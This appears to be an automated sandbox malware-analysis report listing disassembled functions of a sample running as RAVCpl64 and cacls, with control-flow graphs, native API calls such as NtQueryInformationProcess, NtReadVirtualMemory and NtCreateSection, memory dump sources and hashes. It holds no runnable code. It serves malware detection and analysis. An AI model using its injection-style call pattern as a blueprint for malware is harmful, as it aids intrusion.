                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA114F3091CB488FDB59EF68A089665B7E1FB58300F0401BEE84DCB25ADF749590C795
                                                                                                                                                                                                                                  Function 0351423D Relevance: 1.6, APIs: 1, Instructions: 66networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 149 351423d-3514298 call 3510e58 152 35142c4-35142e5 socket 149->152 153 351429a-35142be call 35175e8 149->153 153->152
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183789647493.0000000003490000.00000040.80000000.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3490000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: socket
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 98920635-0
                                                                                                                                                                                                                                  • Opcode ID: c4879cd9c8bdd3a88d1f122245c1659c379012e97cb50e851acbdf588d36cbf8
                                                                                                                                                                                                                                  • Instruction ID: 9ec5152bc9da26ec471eb708d9360d8cdcb2375b6d3cd8023ac2a0e8a31a2257
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c4879cd9c8bdd3a88d1f122245c1659c379012e97cb50e851acbdf588d36cbf8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6011903051CB448FCB84EF28D08865ABBF5FFA8310F1406BEE94DCB26ADB3084418796
                                                                                                                                                                                                                                  Function 0350B8C7 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 156 350b8c7-350b8ed 157 350b90d-350b93a call 35072f8 call 35175e8 156->157 158 350b8ef-350b8fa call 3517e48 156->158 166 350b93c-350b96e call 351becb CreateThread 157->166 167 350b96f-350b979 157->167 158->157 164 350b8fc-350b906 158->164 164->157
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183789647493.0000000003490000.00000040.80000000.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3490000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2422867632-0
                                                                                                                                                                                                                                  • Opcode ID: 91439854b6570c2ed32c889325900e12429c91c3c2bd712b00ed40d0d357c695
                                                                                                                                                                                                                                  • Instruction ID: 6aee58e4f5f2b3bfda70881ffd4c8cc66a8cce82f2ff889b0197ceec723f9749
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 91439854b6570c2ed32c889325900e12429c91c3c2bd712b00ed40d0d357c695
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2411A130214B094FEB18EF28D899366B3E0FB88309F040A7DD459CB2A4CB79C455CB41
                                                                                                                                                                                                                                  Function 035158D2 Relevance: 1.6, APIs: 1, Instructions: 53libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 170 35158d2-3515902 call 3518558 173 3515904-351590e 170->173 174 351590f-351591b call 351ba08 170->174 177 3515929-351593e call 3517d68 174->177 178 351591d-3515924 call 351bcd8 174->178 182 3515940-3515955 LdrLoadDll 177->182 183 351595c-3515964 177->183 178->177 182->183
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183789647493.0000000003490000.00000040.80000000.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3490000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                  • Opcode ID: 2f684eef7083235c58cb3d3e47ec9b3e52ceca823b437d77abfcf55bd5778396
                                                                                                                                                                                                                                  • Instruction ID: 73d0cd7101abdc50c1eb7cfcf42c6978f29782fdd287ae8c5de89632b8b67a31
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f684eef7083235c58cb3d3e47ec9b3e52ceca823b437d77abfcf55bd5778396
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B501D8356187494BE714EB34D4886ABB7F4FFD8315F44092E984DC6160EB35D654C742
                                                                                                                                                                                                                                  Function 035144E6 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 184 35144e6-351452d call 35110a8 187 3514559-351456c closesocket 184->187 188 351452f-3514553 call 35175e8 184->188 188->187
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183789647493.0000000003490000.00000040.80000000.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3490000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: closesocket
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2781271927-0
                                                                                                                                                                                                                                  • Opcode ID: 1aec39b681d6984d21bb0f1014df34a2cbf72aca8e98bdc77ec1a619d24b3d5f
                                                                                                                                                                                                                                  • Instruction ID: 2ebe124cd31b5018a30c7b65ff2f1c3cd4f170c210af8e6dc1fa7b283f22c4a7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1aec39b681d6984d21bb0f1014df34a2cbf72aca8e98bdc77ec1a619d24b3d5f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F01483450CB489FDB80EF28D0887AABBF1FBA8301F44056EE98DCB255DB74D1558756
                                                                                                                                                                                                                                  Function 03DBC75B Relevance: 1.5, APIs: 1, Instructions: 41nativeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 191 3dbc75b-3dbc779 SleepEx 194 3dbc77b-3dbc77f 191->194 195 3dbc7bd-3dbc812 NtCreateSection 191->195 196 3dbc793-3dbc798 194->196 197 3dbc781-3dbc78e call 3dc9988 194->197 198 3dbc79a-3dbc7a1 195->198 199 3dbc814-3dbc82d 195->199 196->198 197->196 201 3dbc7a3-3dbc7bc 198->201 199->198 204 3dbc833-3dbc872 199->204 204->198 206 3dbc878-3dbc8b6 204->206 206->198 208 3dbc8bc-3dbc8d4 206->208 208->201
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183790113877.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B80000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3b80000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateSectionSleep
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2866269021-0
                                                                                                                                                                                                                                  • Opcode ID: 26a8b359b1d785e768215e7169f507bcc39e5c5fdd12a9607919d1d344707e17
                                                                                                                                                                                                                                  • Instruction ID: 1fcb9166dabc6eedc426b072aad6fb15e5863c4cba85e3ee6fca9181ece90eb6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26a8b359b1d785e768215e7169f507bcc39e5c5fdd12a9607919d1d344707e17
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EDF024B2A287048FD71E9F98E8466FDB3B1FB41721F10026BC46A43192C7369067C6CA
                                                                                                                                                                                                                                  Function 03DBC758 Relevance: 1.5, APIs: 1, Instructions: 37nativeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 217 3dbc758-3dbc779 SleepEx 219 3dbc77b-3dbc77f 217->219 220 3dbc7bd-3dbc812 NtCreateSection 217->220 221 3dbc793-3dbc798 219->221 222 3dbc781-3dbc78e call 3dc9988 219->222 223 3dbc79a-3dbc7a1 220->223 224 3dbc814-3dbc82d 220->224 221->223 222->221 226 3dbc7a3-3dbc7bc 223->226 224->223 229 3dbc833-3dbc872 224->229 229->223 231 3dbc878-3dbc8b6 229->231 231->223 233 3dbc8bc-3dbc8d4 231->233 233->226
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183790113877.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B80000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3b80000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateSectionSleep
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2866269021-0
                                                                                                                                                                                                                                  • Opcode ID: e984abe05c4eca9dcccac62b192c90cbf615e7380922af362bcd293f90d83003
                                                                                                                                                                                                                                  • Instruction ID: 0cd1ba6d28c918e0d4d56ad40a4ae3a431cf2aa131993be29537e5dfd486a9a2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e984abe05c4eca9dcccac62b192c90cbf615e7380922af362bcd293f90d83003
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20F02471A287048BC71ADF58E8462FDB3B1FB40720F10026AC46A03191C736D0638289
                                                                                                                                                                                                                                  Function 0350B8BC Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 209 350b8bc-350b92b 211 350b934-350b93a 209->211 212 350b92f call 35175e8 209->212 213 350b93c-350b96e call 351becb CreateThread 211->213 214 350b96f-350b979 211->214 212->211
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183789647493.0000000003490000.00000040.80000000.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3490000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2422867632-0
                                                                                                                                                                                                                                  • Opcode ID: 560ed8ddc0733b82e7d6d5732c35e8bbd5751ea6d889b32f359a0d46776db336
                                                                                                                                                                                                                                  • Instruction ID: 547a5d1d02fdcde2bd157f623b4f0386fda857ec575b657f616ab1e664abd501
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 560ed8ddc0733b82e7d6d5732c35e8bbd5751ea6d889b32f359a0d46776db336
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88F0BE301187454FD744DF78E8A931AB7E0FF98204F490E6AD489CB2A1DA79D5458702

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 03DB8E4F Relevance: .2, Instructions: 151COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183790113877.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B80000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3b80000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: c53ec3ef8d699f557e64d858ec9a2f3d392a1bc7a538d0b273dc371db02c0c02
                                                                                                                                                                                                                                  • Instruction ID: 89ac5c5642b2116a379323f2d0b34edb7179d64f2f207e3d663935278c0e1311
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c53ec3ef8d699f557e64d858ec9a2f3d392a1bc7a538d0b273dc371db02c0c02
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99412B3552CB8D8FD328EF6890816B6F3F6FB49310F50492DC98BC3252E670E4468785
                                                                                                                                                                                                                                  Function 035074BF Relevance: .2, Instructions: 151COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183789647493.0000000003490000.00000040.80000000.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3490000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: dfe410d2dab6e2868a1a4fbc50fb4d091e192fdba4d991d58a0f5a489b8105ad
                                                                                                                                                                                                                                  • Instruction ID: c379f5ef8a1dfeacecd3a74af6f0b7a922e6478539716aff9d10d3eccaae6c24
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dfe410d2dab6e2868a1a4fbc50fb4d091e192fdba4d991d58a0f5a489b8105ad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23411875518B094FD328EFA8E0812B6B3E1FB89310F50052DC88BC32A2E671F4468685
                                                                                                                                                                                                                                  Function 0350D356 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183789647493.0000000003490000.00000040.80000000.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3490000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 206d3df8de130d4977b18170c9d5c4971fb1745e231ad0b477cf04ecb41b2573
                                                                                                                                                                                                                                  • Instruction ID: 9dd2785c8a3aabac85e6d0418aa10f1652ed836c8419cb297d52593f67bde8ea
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 206d3df8de130d4977b18170c9d5c4971fb1745e231ad0b477cf04ecb41b2573
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8CF04C766456519FE7128D28CC82A967759ED02600369388CDAC28FA07D306DA17CA91

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:0.4%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                  Total number of Nodes:11
                                                                                                                                                                                                                                  Total number of Limit Nodes:1
                                                                                                                                                                                                                                  execution_graph 76992 37829f0 LdrInitializeThunk 77000 35cede8 77001 35cee0d 77000->77001 77002 35cef77 NtQueryInformationProcess 77001->77002 77005 35cefe4 77001->77005 77003 35cefb1 77002->77003 77004 35cf083 NtReadVirtualMemory 77003->77004 77003->77005 77004->77005 77007 3782b20 77009 3782b2a 77007->77009 77010 3782b3f LdrInitializeThunk 77009->77010 77011 3782b31 77009->77011

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 035CEDDD Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 542nativeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 0 35ceddd-35cee0b 2 35cee0d-35cee24 call 35d0ff8 0->2 3 35cee29-35cee48 call 35d1018 call 35cce58 0->3 2->3 9 35cf3fd-35cf408 3->9 10 35cee4e-35cef4e call 35ced18 call 35d1018 call 35d4f24 call 35c0388 call 35d05e8 call 35c0388 call 35d05e8 call 35d2ce8 3->10 27 35cef54-35cefe2 call 35c0388 call 35d05e8 NtQueryInformationProcess call 35d1018 call 35c0388 call 35d05e8 10->27 28 35cf3f1-35cf3f8 call 35ced18 10->28 40 35cefe4-35ceff1 27->40 41 35ceff6-35cf06c call 35d4f32 call 35c0388 call 35d05e8 27->41 28->9 40->28 41->40 50 35cf072-35cf081 call 35d4f5c 41->50 53 35cf0ce-35cf10e call 35c0388 call 35d05e8 call 35d3628 50->53 54 35cf083-35cf0c9 NtReadVirtualMemory call 35d1d08 50->54 63 35cf12d-35cf21d call 35c0388 call 35d05e8 call 35d4f6a call 35c0388 call 35d05e8 call 35d3008 call 35d0fc8 * 3 call 35d4f5c 53->63 64 35cf110-35cf128 53->64 54->28 87 35cf24d-35cf265 call 35d4f5c 63->87 88 35cf21f-35cf24b call 35d4f5c call 35d0fc8 call 35d4fbe call 35d4f78 63->88 64->28 93 35cf267-35cf28c call 35d27b8 87->93 94 35cf291-35cf2a3 call 35d1c48 87->94 99 35cf2a8-35cf2b2 88->99 93->94 94->99 101 35cf36e-35cf3d1 call 35c0388 call 35d05e8 call 35d3938 99->101 102 35cf2b8-35cf302 call 35c0388 call 35d05e8 call 35d3318 call 35d4f5c 99->102 101->28 127 35cf3d3-35cf3ec call 35d0ff8 101->127 121 35cf334-35cf33c call 35d4f5c 102->121 122 35cf304-35cf32a call 35d5008 call 35d4fbe 102->122 121->101 131 35cf33e-35cf349 121->131 122->121 127->28 131->101 133 35cf34b-35cf369 call 35d3c48 131->133 133->101
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • NtQueryInformationProcess.NTDLL ref: 035CEF96
                                                                                                                                                                                                                                  • NtReadVirtualMemory.NTDLL ref: 035CF09E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790416695.00000000035C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_35c0000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InformationMemoryProcessQueryReadVirtual
                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                  • API String ID: 1498878907-4108050209
                                                                                                                                                                                                                                  • Opcode ID: da1ad112203496b8553e7941dc3332cf3abdfa8e800f7a0930f34eb3ec825ad3
                                                                                                                                                                                                                                  • Instruction ID: 9d8d6a997b0d55bb86fbf35a0729e7442dc2ac93c5f3feb70cf3abd8e7ca9a82
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da1ad112203496b8553e7941dc3332cf3abdfa8e800f7a0930f34eb3ec825ad3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3022778528B8D8FCBA5EF68D8946EE77F1FB94304F10462E984ACB260DF349645CB41
                                                                                                                                                                                                                                  Function 035CEDE8 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 196nativeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 135 35cede8-35cee0b 136 35cee0d-35cee24 call 35d0ff8 135->136 137 35cee29-35cee48 call 35d1018 call 35cce58 135->137 136->137 143 35cf3fd-35cf408 137->143 144 35cee4e-35cef4e call 35ced18 call 35d1018 call 35d4f24 call 35c0388 call 35d05e8 call 35c0388 call 35d05e8 call 35d2ce8 137->144 161 35cef54-35cefe2 call 35c0388 call 35d05e8 NtQueryInformationProcess call 35d1018 call 35c0388 call 35d05e8 144->161 162 35cf3f1-35cf3f8 call 35ced18 144->162 174 35cefe4-35ceff1 161->174 175 35ceff6-35cf06c call 35d4f32 call 35c0388 call 35d05e8 161->175 162->143 174->162 175->174 184 35cf072-35cf081 call 35d4f5c 175->184 187 35cf0ce-35cf10e call 35c0388 call 35d05e8 call 35d3628 184->187 188 35cf083-35cf0c4 NtReadVirtualMemory call 35d1d08 184->188 197 35cf12d-35cf21d call 35c0388 call 35d05e8 call 35d4f6a call 35c0388 call 35d05e8 call 35d3008 call 35d0fc8 * 3 call 35d4f5c 187->197 198 35cf110-35cf128 187->198 191 35cf0c9 188->191 191->162 221 35cf24d-35cf265 call 35d4f5c 197->221 222 35cf21f-35cf24b call 35d4f5c call 35d0fc8 call 35d4fbe call 35d4f78 197->222 198->162 227 35cf267-35cf28c call 35d27b8 221->227 228 35cf291-35cf2a3 call 35d1c48 221->228 233 35cf2a8-35cf2b2 222->233 227->228 228->233 235 35cf36e-35cf3d1 call 35c0388 call 35d05e8 call 35d3938 233->235 236 35cf2b8-35cf302 call 35c0388 call 35d05e8 call 35d3318 call 35d4f5c 233->236 235->162 261 35cf3d3-35cf3ec call 35d0ff8 235->261 255 35cf334-35cf33c call 35d4f5c 236->255 256 35cf304-35cf32a call 35d5008 call 35d4fbe 236->256 255->235 265 35cf33e-35cf349 255->265 256->255 261->162 265->235 267 35cf34b-35cf369 call 35d3c48 265->267 267->235
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • NtQueryInformationProcess.NTDLL ref: 035CEF96
                                                                                                                                                                                                                                  • NtReadVirtualMemory.NTDLL ref: 035CF09E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790416695.00000000035C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_35c0000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InformationMemoryProcessQueryReadVirtual
                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                  • API String ID: 1498878907-4108050209
                                                                                                                                                                                                                                  • Opcode ID: d62adfa4b9095625c6383cdcd25fb7a14136f12983075199fcedccb6e1f53544
                                                                                                                                                                                                                                  • Instruction ID: bb5e34c828e475b7b747dca76c221408dd1598c625233fc2a16b12eb5d063e5b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d62adfa4b9095625c6383cdcd25fb7a14136f12983075199fcedccb6e1f53544
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56515C74918B8D8FDBA5EF68D8946EE77F1FB94304F10462E984EC7260DF3486458B41
                                                                                                                                                                                                                                  Function 037834E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: 9f24afaae18f6c10bf98f650cbf31498d38818078a827a08daa001e3334f2632
                                                                                                                                                                                                                                  • Instruction ID: 0761fb1f364bfe4695894b06ba18bdfc13b0edd11cbfb238c75bc875c23ee44d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f24afaae18f6c10bf98f650cbf31498d38818078a827a08daa001e3334f2632
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D90023162510812F900A1585614B06100587D2201F61CAA6A0418568DC7A5895175B3
                                                                                                                                                                                                                                  Function 03782B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 278 3782b10-3782b1c LdrInitializeThunk
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: 5de6d66962f095229e63106556265d00c7c5ff0bac8808a8eb323126863c363f
                                                                                                                                                                                                                                  • Instruction ID: f0b3ec709f5dc4254e3f03732cd485ab383adb4e8b666cbb234c1965b2866ff9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5de6d66962f095229e63106556265d00c7c5ff0bac8808a8eb323126863c363f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E790023122100C12F980B1585504A4A000587D3301F91C6AAA0019654DCB258A5977B2
                                                                                                                                                                                                                                  Function 03782B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 277 3782b00-3782b0c LdrInitializeThunk
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.182790505169.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Offset: 03710000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.0000000003839000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.182790505169.000000000383D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3710000_cacls.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: 1e7650e61c2040111fa075155f8706309e59544e855b8140786702e94512201a
                                                                                                                                                                                                                                  • Instruction ID: 098829955d70829eff95a2c266869558ae5dce19cb2db8deebbf787339409af1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e7650e61c2040111fa075155f8706309e59544e855b8140786702e94512201a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7490023122504C52F940B1585504E46001587D2305F51C6A6A0058694DD7358D55B672
                                                                                                                                                                                                                                  Function 03782BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
